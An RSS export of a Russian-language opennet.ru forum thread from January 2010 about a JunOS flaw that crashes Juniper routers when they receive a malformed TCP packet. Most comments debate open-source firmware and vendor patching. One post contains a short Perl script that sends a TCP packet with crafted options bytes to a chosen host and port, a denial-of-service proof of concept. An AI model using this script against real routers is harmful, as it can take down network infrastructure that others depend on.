<?xml version="1.0" encoding="koi8-r"?>
<rss version="0.91">
<channel>
    <title>OpenForum RSS: Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр...</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/62746.html</link>
    <description>Компания Juniper Networks объявила (http://praetorianprefect.com/archives/2010/01/junos-juniper-flaw-exposes-core-routers-to-kernal-crash/) об обнаружении уязвимости в ядре операционной системы JunOS, под которой работают большинство маршрутизаторов Juniper. Посылка специально сформированного TCP пакета (с неправильно оформленной заглавной частью) на открытый порт самого маршрутизатора вызывает крах ядра, ведущий за собой рестарт устройства. Встроенный межсетевой экран не в состоянии &quot;поймать&quot; и изолировать такой пакет. &lt;br&gt;&lt;br&gt;&lt;br&gt;Проблеме подвержены почти все версии JunOS, начиная с 5.3.5 p0-2 и заканчивая 9.0R1.1 (полныю список приводится здесь (http://www.securityfocus.com/bid/37670)). По словам Juniper Networks, проблема обнаружена самой компанией во время проверки на совместимость с оборудованием других производителей. Подробностей по поводу того каким образом должен быть сформирован пакет не сообщается. По неофициальным данным, обновление будет доступно в понедельник, 11 января. &lt;br&gt;&lt;br&gt;&lt;br&gt;URL: http://praetorianpref</description>

<item>
    <title>Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр... (arachnid)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/62746.html#33</link>
    <pubDate>Tue, 19 Jan 2010 05:38:55 GMT</pubDate>
    <description>&amp;gt;&amp;gt;ну я бы сказал, что подобная реакция заслуженна определенным поведением, разве нет? &lt;br&gt;&amp;gt;&lt;br&gt;&amp;gt;Как &lt;br&gt;&amp;gt;&lt;br&gt;&lt;br&gt;как заслуженна? еще раз отрывок из коммента выше напомнить? :) &lt;br&gt;&lt;br&gt;&amp;gt;&amp;gt;опять же - никакая лицензия не заставит выпустить производителя&lt;br&gt;&amp;gt;&amp;gt;выпускать обновления быстро. &lt;br&gt;&amp;gt;&lt;br&gt;&amp;gt;Да, вот только для длинков и асусов всяких, с их GPL - &lt;br&gt;&amp;gt;желающие сами могут запатчить большинство ляпов. Посему те кто не хочет &lt;br&gt;&amp;gt;быть рассадником ботов, глюков, багв и делать вендору годами минет в &lt;br&gt;&amp;gt;надежде что все это может быть починят (а может быть и &lt;br&gt;&amp;gt;нет, какие гарантии то?) - получают шанс потрепыхаться сами. И я &lt;br&gt;&amp;gt;не понимаю какого хрена у них за их бабки этого шанса &lt;br&gt;&amp;gt;быть не должно. &lt;br&gt;&lt;br&gt;то устройство, на которое я ссылался, тоже на линухе с gpl. и? &lt;br&gt;&lt;br&gt;&amp;gt;&amp;gt;то есть в данном случае я не вижу связи между сообществом &lt;br&gt;&amp;gt;&amp;gt;freeBSD и выпуском джунипером обновлений. &lt;br&gt;&amp;gt;&lt;br&gt;&amp;gt;Именно. Между сообществом и вендором связи никакой. И на самом деле это &lt;br&gt;&amp;gt;- dead way. Коллаборативная работа над проблемой - заруливает растаскивание по &lt;br&gt;&amp;gt;углам с </description>
</item>

<item>
    <title>Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр... (arachnid)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/62746.html#32</link>
    <pubDate>Tue, 19 Jan 2010 05:19:08 GMT</pubDate>
    <description>&amp;gt;&amp;gt;&lt;br&gt;&amp;gt;&amp;gt;идешь на сайт интела и берешь прошивку. все просто. правда энтузиастам пока &lt;br&gt;&amp;gt;&amp;gt;почему то не удалось сделать свою. &lt;br&gt;&amp;gt;&amp;gt;&lt;br&gt;&amp;gt;&amp;gt;http://www.intel.com/support/ru/motherboards/server/ss4000-e/ - вот оно. как то пока &quot;Олега&quot; на это устройство не &lt;br&gt;&amp;gt;&amp;gt;наблюдается. &lt;br&gt;&amp;gt;&amp;gt;&lt;br&gt;&amp;gt;&lt;br&gt;&amp;gt;а оно надо этому девайсу? &lt;br&gt;&amp;gt;с вайфаем -- была острая необходимость. здесь то что? &lt;br&gt;&lt;br&gt;а здесь - потрясающе низкая скорость работы сетевого накопителя. &lt;br&gt;&lt;br&gt;</description>
</item>

<item>
    <title>Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр... (User294)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/62746.html#31</link>
    <pubDate>Mon, 18 Jan 2010 15:42:05 GMT</pubDate>
    <description>&amp;gt;Так покопайтесь с Time Capsule - внутри 100&#037; Marvell &lt;br&gt;&lt;br&gt;Это чего-то яббловское как я понял? От продукции яббла я предпочитаю держаться подальше, слишком уж противный и ограничительный вендор, даже хуже MS имхо, т.к. задранные цены + в их железках всегда найдется какая-то пакость которая отравит удовольствие от обладания девайсом. Да и если у вас нет мака (а мне и без него хорошо) - яббловские железки обычно не слишком ориентированы на всех остальных. Вот если несколько более-менее нейтральных вендоров начнут юзать платформу для роутеров, я к ней присмотрюсь, факт.&lt;br&gt;&lt;br&gt;P.S. а вообще, честное пионерское, мне есть с чем поковыряться в свое удовольствие и я в состоянии выбрать себе предметы ковыряния сам. Без всяких ябблов на горизонте. &lt;br&gt;</description>
</item>

<item>
    <title>Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр... (User294)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/62746.html#30</link>
    <pubDate>Mon, 18 Jan 2010 15:30:36 GMT</pubDate>
    <description>&amp;gt;ну я бы сказал, что подобная реакция заслуженна определенным поведением, разве нет? &lt;br&gt;&lt;br&gt;Как &lt;br&gt;&lt;br&gt;&amp;gt;опять же - никакая лицензия не заставит выпустить производителя&lt;br&gt;&amp;gt;выпускать обновления быстро. &lt;br&gt;&lt;br&gt;Да, вот только для длинков и асусов всяких, с их GPL - желающие сами могут запатчить большинство ляпов. Посему те кто не хочет быть рассадником ботов, глюков, багв и делать вендору годами минет в надежде что все это может быть починят (а может быть и нет, какие гарантии то?) - получают шанс потрепыхаться сами. И я не понимаю какого хрена у них за их бабки этого шанса быть не должно.&lt;br&gt;&lt;br&gt;&amp;gt;то есть в данном случае я не вижу связи между сообществом &lt;br&gt;&amp;gt;freeBSD и выпуском джунипером обновлений. &lt;br&gt;&lt;br&gt;Именно. Между сообществом и вендором связи никакой. И на самом деле это - dead way. Коллаборативная работа над проблемой - заруливает растаскивание по углам с большим отрывом. &lt;br&gt;&lt;br&gt;&amp;gt;так же, например, как между длинком, выпускающем soho-роутеры на линухе, &lt;br&gt;&amp;gt;и боте-нете на оных и собственно самим линухом. &lt;br&gt;&lt;br&gt;В случае линуха - если мн</description>
</item>

<item>
    <title>Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр... (boykov)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/62746.html#29</link>
    <pubDate>Mon, 18 Jan 2010 14:57:28 GMT</pubDate>
    <description>&amp;gt;&lt;br&gt;&amp;gt;идешь на сайт интела и берешь прошивку. все просто. правда энтузиастам пока &lt;br&gt;&amp;gt;почему то не удалось сделать свою. &lt;br&gt;&amp;gt;&lt;br&gt;&amp;gt;http://www.intel.com/support/ru/motherboards/server/ss4000-e/ - вот оно. как то пока &quot;Олега&quot; на это устройство не &lt;br&gt;&amp;gt;наблюдается. &lt;br&gt;&amp;gt;&lt;br&gt;&lt;br&gt;а оно надо этому девайсу?&lt;br&gt;с вайфаем -- была острая необходимость. здесь то что?&lt;br&gt;</description>
</item>

<item>
    <title>Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр... (анон)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/62746.html#28</link>
    <pubDate>Fri, 15 Jan 2010 05:29:04 GMT</pubDate>
    <description>йо. ваше маниакальное стремление пересадить всех на опенсорц напоминает РМС. хотите использовать в ядре сети железку с прошивкой &quot;от олега&quot; - ваше дурное право. но пропагандировать свою дурь это уж через чур. да, кстати. сетевые железки - большой бизнес. а в бизнесе не будет ничего открытого, ибо конкуренция и коммерческая тайна.&lt;br&gt;</description>
</item>

<item>
    <title>Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр... (luzers)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/62746.html#27</link>
    <pubDate>Mon, 11 Jan 2010 11:27:19 GMT</pubDate>
    <description>#!/usr/bin/perl&lt;br&gt;&lt;br&gt;my $host = shift;&lt;br&gt;my $port = shift;&lt;br&gt;&lt;br&gt;use Net::Packet qw($Env);&lt;br&gt;&lt;br&gt;use Net::Packet::IPv4;&lt;br&gt;my $ip = Net::Packet::IPv4-&amp;gt;new(dst =&amp;gt; $host);&lt;br&gt;&lt;br&gt;use Net::Packet::TCP;&lt;br&gt;&lt;br&gt;my $tcp = Net::Packet::TCP-&amp;gt;new(&lt;br&gt;dst =&amp;gt; $port,&lt;br&gt;options =&amp;gt; &quot;&#092;x65&#092;x02&#092;x01&#092;x01&quot;,&lt;br&gt;);&lt;br&gt;&lt;br&gt;use Net::Packet::Frame;&lt;br&gt;my $frame = Net::Packet::Frame-&amp;gt;new(l3 =&amp;gt; $ip, l4 =&amp;gt; $tcp);&lt;br&gt;&lt;br&gt;$frame-&amp;gt;send;&lt;br&gt;exit 0;&lt;br&gt;</description>
</item>

<item>
    <title>Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр... (Аноним)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/62746.html#25</link>
    <pubDate>Mon, 11 Jan 2010 05:55:24 GMT</pubDate>
    <description>Если не сложно можно связаться с Вами для уточнения содержимого пакета, так как подбор не помог и Жунипер не отреагировал, встает вопрос версия не восприимчива или просто не правильно сформирован пакет?&lt;br&gt;</description>
</item>

<item>
    <title>Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр... (Аноним)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/62746.html#24</link>
    <pubDate>Mon, 11 Jan 2010 04:11:32 GMT</pubDate>
    <description>Ясно. Тогда я не оценил масштабов трагедии.&lt;br&gt;</description>
</item>

</channel>
</rss>
